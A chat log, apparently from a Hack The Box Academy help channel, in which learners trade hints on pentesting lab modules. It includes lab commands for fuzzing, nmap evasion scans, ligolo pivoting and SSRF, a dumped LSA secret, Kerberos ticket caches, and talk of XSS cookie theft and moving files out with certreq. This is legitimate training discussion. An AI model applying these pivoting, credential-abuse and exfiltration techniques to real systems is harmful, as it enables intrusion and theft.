for this section i already found the version but why i got Wrong Answer?

for the question number 1

I found the issue thanks.

I haven't started the module but if you are looking for a wordpress version using wappalyser to check your answer may help, if they arent the same odds are it may be wrong

that's not the website you're supposed to visit

where do you even get that

this is the main website,but the main website is not using wordpress

yeah so find the wordpress site

click around

can anyone help me for Attacking Common Applications:osTicket
i try to use credentials which in the instruction but it give error, do i need to register with dehashed which in lab and then search usernames or what?

can anyone answer?

I've already done it, but I still can't find it.

Look at each link

Burp is way way slower than firefox, any fixes in mind? Firefox running htb exercise on browser loads immedialty but brup takes like a minute or soo. Any ideas?

I just mucked about a bit, and I found it, the link should stand out to you its what you do after to get the info... nudge nudge

the burp browser?

After many tries i can not find right answer anyway 😦

just let it loop 5 times and look inside $rax

alright thank u

i already checked all links from the website

what is wordpress most commonly used for?

not trying to be harsh or cryptic but you will learn a lot once it clicks, Its an uncomfortable feeling but you are close

expect for the blog site,i cannot open it

add it to your hosts file?

Can anyone tell me where the issue is?

in FootPrinting Lab-Medium

You are not root

i got it i was using sudo..
i have to switch to root by sudo su then do it

Thanks man

Hi guys, I'm having issues with the Skill Assessment of the Pivoting module. Is there anyone which can help me sort it out?

I am basically stuck when trying to enumerate the available networks. As far as I could read online I'm supposed to be able to ping a given machine, but it seems like I cannot reach it. I don't get whether I'm forgetting something or if I'm in an edge case which for some reason doesn't make it work

Hello,

any help on this?
i cannot reach the internal network

Crackmapexe skills assessment https://academy.hackthebox.com/module/84/section/1747

chisel works just fine with other moduels

https://academy.hackthebox.com/module/9/section/1583
Hello everyone, could someone assist me with those modules?
A question appears in that module.

"What are all the methods available to remotely access Windows operating systems?"

If we go straight to Google, we will definitely find the solution to that query. But why go for extra mile and connect each component? The answers stay the same.

What is your question?

Why should we apply Relationship-Oriented-Questioning (ROQ) model?

I have a little problem choosing the right list for Web FUZZING skill assesment.

I tried to hard set one of the args as an id or FUZZ both with the small lists. I replaced those in the command below to avoid giving out answers here, but the long list runs longer than my server stays up, so I think I am meant to use one of the short ones. Those, however, don't get me a flag. Is something with the command wrong or what list might I need to use?

ffuf -w ./cirt-default-usernames.txt:FUZZ -u 'http://faculty.academy.htb:52010/courses/endpoint.extension' -X POST -d"arg1=0&arg2=FUZZ" -H 'Content-Type: application/x-www-form-urlencoded' -fs 774,781

Apologies, ran the longest list again and found the answer. Should have been more patient.

hello, I have a question about sql injection module. I don't understand this. Since the AND operand is evaluated before, this does not make sense to me. Wouldn't it be the same result with '1'='2'?

Yeah... that might be a typo but you could prove it easily by trying out the sequence of queries in the lab.

I would encourage you to try. But, yeah, you're not the first one to have their mind warped by that assertion.

Need help with Skills Assessment - Hard in Abusing HTTP Misconfigurations module

https://academy.hackthebox.com/module/17/section/64
for the question number 3 have i done it correctly?

thank you

I found the parameter for XSS, poisoned the cache but it doesn't seems to impact the verification bot, I tried to steal the session cookie and calling http://httpattacks.htb/admin/promote?uid=2 using my XSS payload but nothing works

on more thing how do you hide text (shown when click on the black box) here in discord?

@rapid fog @dapper moth @spring lily

So from what I understand memory works best when you're relating "things you're learning" to "things you know". Someone else may have a better answer for you, but those meta-modules are abstract so, they're very much a take from them what you will.
There was actually a great radio broadcast I caught the other week with an academic that studies how memory works upon which I'm basing this answer. If you wanted to hear more on the topic it's worth a listen and some notes:
https://hiddenbrain.org/podcast/remember-more-forget-less/

Make sure you close your tags and check the messages in the debug console

but it works locally

Double pipes in front and after the text

can i solve it with wpscan and visit the url plugins?

but i still cannot find the flag

There are some good hints in the forum post

@fathom pendant can i dm you directly?

I got it, thank you

Finally solved

Hello, can someone help how to get a reverse shell for the AEN Web Enumeration & Exploitation. The Web shell that I got after getting the creds is limited from commands and with burpsuite unable to make the correct payload

got it or still stuck?

for the first time in htb i feel really lost, i'm reading the Footprinting DNS module and just can't get my head around it. someone here have some good other resources i can try to understand DNS ?

chat gpt

do you know what an IP address and a hostname is?

i'm trying this already yes

i tought i do but now i'm doubting

DNS simply resolves a hostname into an IP address

I've figured it out thx

ok so i'm not completely lost, i'll try to do the lab and read more about it. My difficulty is more in the understanding of the different file (zone files etc...) thanks man

Zone files contain mappings of domain names to IP addresses, among other DNS records.

not that complicated

You could watch a video on DNS to supplement your understanding 🙂

sometimes you just need to go over it a couple of times

Module: AD Enumeration & Attacks - Skills Assessment Part II
Question: Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
I want to add a certain user to a certain group, I want to do it using powerview, but somehow it is not working correctly. I do not understand what is wrong, as the first command works the second one does not work

I was initially using a evil-winrm shell, I thought there was some issue with that, but same issue happed using rdp

because it's not a valid cmdlet

did you mean Get-DomainGroup?

ok this is a bad example, i tried Find-InterestingDomainAcl also

did not work

here is the correct command

looks like a different error, now you're missing parameters

I'm trying to get my double pivot to work, I setup a listener and stuff but I can't get it working

Yes you right

Make sure you actually have the PowerView.ps1 script dropped onto the target and imported before you attempt this.

Pro tip: I did this completely filelessly

What you pivoting with

ATKBOX -> ubuntumachine -> Windows -> (internal network)

What tool

ligolo

I have my tunnel, setup my second interface, added my lisetener

but when I connect no new session

Try using the 240.0.0.1 IP address and see what happens

Need to see pics tbh. Dm me

One little thing could mess it all up

listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

.\agent.exe -connect INTERNAL-PIVOT-IP:11601 -ignore-cert

For the second layer of pivoting, replace 127.0.0.1 with 240.0.0.1.

okay trying now

Yeah that should work

Are you getting errors or it’s just not connecting?

just not conecting

It must be the ip then

which module is this

Another thing: check your firewall settings. If you're using a local machine to attack and not the PwnBox, you could have connections being blocked, as I had to learn the hard way

these are the interfaces

ligolo: flags=4241<UP,POINTOPOINT,NOARP,MULTICAST>  mtu 1500                                                                                                                                                [0/138]
        inet6 fe80::3185:eae8:5c78:6a8c  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 36413  bytes 7082622 (6.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 28949  bytes 10454709 (9.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ligolo1: flags=4241<UP,POINTOPOINT,NOARP,MULTICAST>  mtu 1500
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

I'm using pwnbox

AEN

Dm a pic with the ips

I'm gonna reset everything one sec

got it, thanks everyone

Hey I just joined kinda watching the show it’s crazy how much u guys support each other and u I fuckin respect that

Anyways I’m tryna get into hacking what some basic stuff I need and I also need a mentor I’ll pay for lessons

This is the typical page people link to when someone like yourself asks for a place to start:
https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Thank you

Professionally maybe you can find yourself a mentor, but as for the technical education -- as you've brought up -- you will learn everything you need with your own reading and by learning to ask good questions of the community who is happy to help.

Thank you I really appreciate that

look @safe star idk how to import '$conn' using php

it's the last question

you read it wrong, they mean that its imported from another file

you have to read that imported file

ahh

is there mods on this servers?

are you about to drop smth?

it's config.php right?

idk, just check either way

What is it about?

Any help for Advanced XSS and CSRF exploitation skills assessment? Can bypass samesite cookie restriction to the main domain but seems like it’s refusing to send with the subdomain

happy sunday everyone. i had a question about the Windows Attacks and Defense regarding the Kerberoasting. when i try to connect to the kali attack box via ssh it keeps giving me a connection refused message. is there something im missing?

probably firewall

on my end or the freeRDP target ip?

wait what attack box

looks like it's just a windows box isn't it?

use the pwnbox or your vm?

pwnbox

yeah or you can RDP into it

you can kerberoast from linux but this module doesn't cover it i think, just from windows

so you'll want to RDP into the machine with your pwnbox

which i did

so what's the issue

well it asks me to share the outfile that has the results from the kerberoasting to the kali box. doesnt mention anything about pwnbox.

if you're not using your own kali vm you can just use the pwnbox (parrot) instead

ok. so basically substitute kali for pwnbox. thank you. was a little misguided on this one

yeah. if you add /drive to your xfreerdp command you can also easily share a folder. like /drive:/home/supernuts/desktop

oh my lord you made that 10x easier. thank you

if you aren't doing it also try out /dynamic-resolution

yup just tried that. i copy most of the commands that htb provides. its alot easier on the eyes now lol

Guys I need help in the Firewall and IDS/IPS Evasion - Medium Lab (Network Enumeration with Nmap)

I tried every possible command even commands I found on the forum

Nothing appears to solve it for me

Is this normal?

I cant remember the Module 100% anymore, but DNS is probably UDP. So did you check UDP, too?

Yeah I checked it

I literally got commands that solved it for some people yet it didnt solve it for me lol

just checked it, works

did you use Options to fingerprint the Port?

pay close attention to the Output then

have you tried to look if there is some NSE scripts that could be helpful ?

I tried the following:
nmap -Pn -T4 -A -v -sV 10.129.57.157 -p 53 -D RND:5 --stats-every=5s
nmap -sV --version-intensity 9 -p 53 --script dns-service-discovery 10.129.2.48”
nmap 10.129.2.48 -p53 -sV -Pn -n --disable-arp-ping --packet-trace --script banner
nmap 10.129.2.48 -p53 -sS -sV -Pn -n --disable-arp-ping --packet-trace

I also added the -sU

DM me

What part is unclear?

hey did anyone have a problem with server-side attacks instance, mine instance for ssrf doesnt work

Have you tried changing the TCP flag? Try following the same steps in the evasion section

You are clearly just scanning one port with this

Yes the answer is in this port

I'm sure

Of course it is

Try following the steps in the evasion section

It is the exact same thing

Host: 10.129.63.227
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

dateserver=http://127.0.0.1/&date=2024-01-01``` 
did exact same thing as in the identifying ssrf section, am i missing something or what?

is there by chance some sort of cli imap client I can easily fire up that ships with pwnbox? I've done the modules on manually accessing mail and whilst I'm glad to have learnt it, there's got to be an easier way

netcat?

it works with openssl s_client. It just feels like there'll be some more convenient imap_all_mail_downloader.py sitting there i won't know about unless I ask.

currently on the attacking SMB module and I have the username and password of who I need to login with via SSH however I keep getting denied saying I have a public key and I never get prompted to put in a password

You might want to check out ssh's -o option and... uh... the PreferredAuthentication option maybe. You'll have to google it, but you can tell SSH that you want to auth with a password. I don't know if that's your solution, but it's the first thing that comes to mind.

I just looked in the manpage and it seems like you would be correct, my excercise requires me to ssh to find the flag.txt

there's another one too, PubkeyAuth I think. It's like something I need to do once a year so I just always google it: force ssh password auth

or man page it. that's smart.

what do I type exactly after -o?

yea, I dunno because it's one of those arguments that takes a huge string as an argument

😭

-o BlahBlah=true,OtheRBlah=yes

or maybe you pass multiple -o's

¯_(ツ)_/¯

hmm we may be onto something here

i'm trying to do this windows lab with rdp but the windows box isn't connected to the internet lmao what do i do

why do you need to connect it to the internet

file transfers

can you just transfer it from your vm/pwnbox that already has internet?

no i'm trying to abuse certutil.exe but for some reason it will not connect to my vm

or uh
certreq

can you ping the target

yep

i can rdp to the target but the remote machine is not connected to the internet

so you can connect

so just map a drive and transfer that way

no i'm trying to abuse certreq.exe but it will not connect to my kali vm

the point of the lab is to try to transfer files in specific ways, not just any way

sorry really confused first you said the windows box couldn't connect to the internet, then you said it couldn't connect to your vm but you were able to rdp so it does connect.. then you wanted to file transfer, but not that way

still really confused as to what exactly you're trying to do

best to say what module and section and question you're on

file transfers - living off the land

ok so the way you transfer files using certreq.exe is you use it to send a POST request to a netcat listener but it won't connect to my netcat listener because it's not connected to the internet

everything should work fine as long as your on the vpn

the remote machines dont have internet

ok then i have no idea what's going on because i keep timing out every time i try to connect from the remote machine back to my kali vm

your kali machine can ping it right?

yeah i can rdp just fine

what error are u getting?

it might be the module tbh, ive seen some people have problems with this method too

ok looks like i got it, i just had to connect to the tun2 address on my kali vm because tun1, tun0, and eth0 weren't working

i assume tun2 is probably the rdp connection which would make sense

unless i know nothing about networking and it doesn't make sense

i know the 3 tuns are from openvpn

3 tun interfaces is kinda odd

yeah idk why i had 3

you should usually have only tun0

usually i do

yeah not sure what happened there but its solved now

will remember that

you might have multiple OpenVPN instances

should probably sudo killall openvpn

then reconnect to the VPN

what calculac0re said... those are network adapters not services (like rdp)

Anyone available to give me a nudge on Broken Authentication - Skills Assessment? I have the ||username and password|| and I read that ||brute-forcing the otp|| is not the right path.

maybe try a different way then

I have looked at ||the two bypass techniques discussed in the modules|| but no luck so far. Any hint?

you're on the right track

anyone free to dm, stuck on icmp tunneling with socks section of pivoting tunneling and port forwarding

I see how one of the ways may work, but I am still stuck. May I DM you?

there's not much more i can say really

nvm i killed my port forward by accident

did you read #welcome

DM if you still need assistance

Help received, deleting the original message - as it is not related to modules

guys my cherry tree file got corrupted please tell me there's a way to fix

Yeah sure dm

im running nmap but my output is looking different than the example:

 nmap --script smb-os-discovery.nse -p445 10.10.10.40

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 00:59 GMT
Nmap scan report for doctors.htb (10.10.10.40)
Host is up (0.022s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: CEO-PC
|   NetBIOS computer name: CEO-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-12-27T00:59:46+00:00

Nmap done: 1 IP address (1 host up) scanned in 2.71 seconds

thats what the webpage looks like but this is my result:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-06 21:56 EDT
Nmap scan report for 10.129.121.141
Host is up (0.48s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.99 seconds

so im missing the host script results. im running this on a kali vm instead of parrot that pwnbox uses. would that effect the display results?

Hello can someone help please how do u crack this "hexadecimal plaintext" that I got in the AD module from the LSA Secrets of the crackmapexec output:
INLANEFREIGHT\ACADEMY-EA-DC01$:plain_password_hex:8fb2ee679171183b03424facf77f129bd2646961989352bd4c19dc1791aac80d396afd390409971495d83cf022140052fa430dcbce392b0ce5cdb2e3000c4cbf92d592987a8e7b78e4ea302bda48e0390878d0f550efaa15966bb61810a21ca27263e4e81941e0bb8d522a0521501e052f93ed6e47d1674c4cc835395204248f6b4d13fbb680facd43089ed2790926ee34fce1da66abcd7f7fae23c277fa7b7ed4b700976c61e17d3c2e25564f74b2218935c68d42dcee6ca642de87c9cdc77c8f3c6fd7973e62b52fd23ffc3adef2ed238cfdb94b2563c0ce4422d25a48fde3c161bb8a2d57266a9545f8e44e0462a2
Please @ me if you have any idea about this . Someone said it may be a service account and then u can use an attack to get authority system ?

for this exercise "attacking email services" I managed to grab the email address and password that I needed but I cannot figure out how to log into the email address using the command line. I need to login through smtp specifically

not sure what part you're on since you didn't say but cracking that is not the right path.

I understand sir but I am not trying to follow the path, I make my own path. Do u have any input on the matter that I asked about?

i did give input on the matter you asked about. it's the wrong way to do it.

Can I Crack that or no

i already told you that you can't do anything with it

why do you need to crack it? when you dump lsa you would've gotten the machine account's NTLM

.

if you have that, then you should have the NT hash of the computer account

either way machine account passwords are not crackable

But i dont have nt of acct user i just got this from CME "LSA Secrets" output... Im just trying to learn how to use this

you don't

Hey guys I need your help

go on

I need to get several video from a website I need the best quality

still stuck on this, logging in through telnet isn't giving me what I need

???

no one here can help with that. this discord is about the hackthebox platform.

You didn't mention which module or section so gonna be hard to help, but try an email client maybe? just connect it.

It's week 6 "attacking common services" "attacking email services" specifically the SMTP section

idk if it has a different name for you, this is just how it shows up for me

what's the email client in our pwnbox?

re-read the section it goes over how to read email

I ain't gonna lie, I haven't been able to see where it says that I've gone up and down it for hours now

choose whatever email client you like

if you did the footprinting module that also shows you some ways

where? I'm not seeing anything

also the email client did not work

#cdsa Hi i am facing issue in connecting to lab for "Packet Inception, Dissecting Network Traffic With Wireshark" section.I tried RDP for lab from Pwnbox , but the lab OS shows black screen? any one has face this issue before. As far as i am concerned, no history was found in support the issue.

press space bar on the black screen

Hi, thanks for the response, i tried the space bar , it is still not working

where did you find this

Center left third of the screen, click around there, there's a button.

Can anyone tell me what is the best way to protect my website from CSRF. Some of the options that I’ve considered (or a combination of) are below. I want to fully support older browsers as much as possible (That means not fully relying on CORS preflight, I guess). Any suggestions are much appreciated. Thanks

• Disallow simple content types
• Custom header
• Double submit cookie
• Synchronizer token pattern

hi budy did u solve it? , Im in the same spot i have the port and i try medusa but is not working.

anyone know how to fix this?

did the same thing as in the section, and it just keep saying waiting and then no route to the host

anyone to help?

nc listener is not a http server. try making a python3 http server and see if you get a hit.

idk why but last night it didnt want to work for 2 hours, i did the exact same things, and suddenly now it works

with the http server?

with netcat

hmm idk

did it end up working

with nc?

yeah

well if it works it works

i think it doesnt matter for testing out ssrf, nc only listens for incoming data no matters what

yhyh thanks anyway

also whenever i try to interact with the dll it just deletes itself? anyone know why

This is the wallpaper, nothing wrong with the machine

Make sure you've disabled defender and its functionalities

yeah i checked defender and i think its disabled by default for the modules, im having a break now so ill have a look again later.

I'm doing the API Attack module on Unrestricted Resource Consumption Section. I'm a bit lost on the question
" Exploit another Unrestricted Resource Consumption vulnerability and submit the flag."
The hint say "Focus on the POST /api/v1/authentication/customers/passwords/resets/sms-otps endpoint." but I dont know what I can do with that reset

nvm I have solved it

┌─[us-academy-5]─[10.10.14.124]─[htb-ac-1163718@htb-sed4nrlnoa]─[~]
└──╼ [★]$ xfreerdp /u:Administrator /v:10.129.13.80 /p:AnotherC0mpl3xP4$$
[03:39:39:180] [5243:5244] [INFO][com.freerdp.crypto] - creating directory /home/htb-ac-1163718/.config/freerdp
[03:39:39:180] [5243:5244] [INFO][com.freerdp.crypto] - creating directory [/home/htb-ac-1163718/.config/freerdp/certs]
[03:39:39:180] [5243:5244] [INFO][com.freerdp.crypto] - created directory [/home/htb-ac-1163718/.config/freerdp/server]
[03:39:39:699] [5243:5244] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[03:39:39:699] [5243:5244] [WARN][com.freerdp.crypto] - CN = MS01.inlanefreight.htb
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - @           WARNING: CERTIFICATE NAME MISMATCH!           @
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - The hostname used for this connection (10.129.13.80:3389) 
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - Common Name (CN):
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] -     MS01.inlanefreight.htb
[03:39:39:700] [5243:5244] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 10.129.13.80:3389 (RDP-Server):
    Common Name: MS01.inlanefreight.htb
    Subject:     CN = MS01.inlanefreight.htb
    Issuer:      CN = MS01.inlanefreight.htb
    Thumbprint:  0c:41:a7:8d:23:e4:45:90:b3:e9:95:4b:32:ea:2c:2b:2a:ee:2b:66:d5:df:4b:21:32:6b:67:8b:51:97:aa:9b

is it just me encountering this on password attacks module?

nvm, it worked on rdesktop lol

Where is the correct place to ask for help with a module?

I have searched previous questions and answers regarding the issue I am experiencing and others have had it as well

I cannot find an answer however for my issue

this is the place

ok, so I am working on Footprinting SNMP, final check using snmpwalk, snmp-check etc and I get target timeout using pwnbox or my own vpn connections, UDP or TCP

I have tried setting the -t25 and it does not matter

I have spawn 4 targets and none of them respond to those tools following demonstrated solves

searching for this in Discord shows I am not alone in experiencing this

Are you using the correct community string

Sorry, not using nmap brute-force script

I have tried that as well, it times out

this result is from using snmpwalk -v2c -c public -t25 -r2 <ip addr>

works for me

yeah, I think there is some other issue that I am not detecting

ok, so of course it starts working now

zero changes in the command

https://academy.hackthebox.com/module/17/section/64
to obtain a shell can we get it from theme editor?

Hello After completing a module what can you do to keep practice and increase knowledge? Pentesting job role path

You can find content that contains knowledge from X, Y and Z modules - https://academy.hackthebox.com/academy-lab-relations

and practice

Do i need subscribe to labs to get access to it?

yup

Find a way to manipulate the php code of a page

hello i nneed help in [ Exploiting Web Vulnerabilities in Thick-Client Applications
] its my last flag

i am confused the link you gave me what for? is it for showing CTFs machine related to the module?

right, you can practice the knowledge from the modules across machines, fortresses, prolabs etc

okay i selected module : Network Enumeration with Nmap. i found easy machine shoppy i clicked on it nothing happen. sorry i don't know what to do i never seen this page before.

Oh if you wanna do the machine, you need to get on labs and search for shoppy.

so i can't do any machine practice if i have academy access only?

This is the right approach, select a machine, and then check out what knowledge would be required to be solved. The modules will contain the skills needed, and you can practice

Academy and labs subscription is separate. You can do the machine for free if it's active. Retired machines require a sub.

i need help

Thank you

With what

when working with things like that click about and find where you can alter things, if you have never used it before get used to it as it may appear again especially in CTFs. How can you get that page to behave how you want it to.

hello i nneed help in [ Exploiting Web Vulnerabilities in Thick-Client Applications
] its my last flag

Yo yo

On the Linux Pass the hash module

We can see here that we have some cache files

-rw-------  1 julio@inlanefreight.htb            domain users@inlanefreight.htb 1406 Oct  7 11:35 krb5cc_647401106_HRJDux
-rw-------  1 julio@inlanefreight.htb            domain users@inlanefreight.htb 1406 Oct  7 11:35 krb5cc_647401106_qMKxc6
-rw-------  1 david@inlanefreight.htb            domain users@inlanefreight.htb 1406 Oct  7 10:43 krb5cc_647401107_O0oUWh
-rw-------  1 svc_workstations@inlanefreight.htb domain users@inlanefreight.htb 1535 Oct  7 11:21 krb5cc_647401109_D7gVZF
-rw-------  1 carlos@inlanefreight.htb           domain users@inlanefreight.htb 3175 Oct  7 11:35 krb5cc_647402606
-rw-------  1 carlos@inlanefreight.htb           domain users@inlanefreight.htb 1433 Oct  7 11:01 krb5cc_647402606_ZX6KFA```

and the module wanted to use julio

Importing the ccache File into our Current Session
root@linux01:~# klist

klist: No credentials cache found (filename: /tmp/krb5cc_0)
root@linux01:~# cp /tmp/krb5cc_647401106_I8I133 .
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_I8I133
Default principal: julio@INLANEFREIGHT.HTB```

but where did this `/root/krb5cc_647401106_I8I133` came from? is that an accident

malware

got stuck in zypher initial access. any little help ?

#htb_pro_labs

ask in #1263635449335910531

I don't have acces to that. how do i access that chat

Hey guys, i use onenote for my note do you know a manner for doing like a snapshot of it? We never know what cna happen and if i loose them all my work will be gone